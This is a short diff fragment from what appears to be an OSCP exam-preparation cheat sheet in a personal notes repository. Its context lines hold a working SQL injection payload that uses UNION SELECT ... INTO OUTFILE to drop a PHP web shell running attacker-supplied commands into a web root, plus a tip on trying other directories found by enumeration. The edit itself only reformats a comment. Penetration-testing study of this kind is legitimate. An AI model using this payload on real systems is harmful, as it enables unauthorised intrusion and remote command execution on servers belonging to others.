douglaskataki/oscp-report-notes/Cheatsheet - Machines.md

 ' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
 ```
-#note try other directories like html or other that you have found out via Directory Enumeration
+NOTE: try other directories like html or other that you have found out via Directory Enumeration

 To access it:
 ```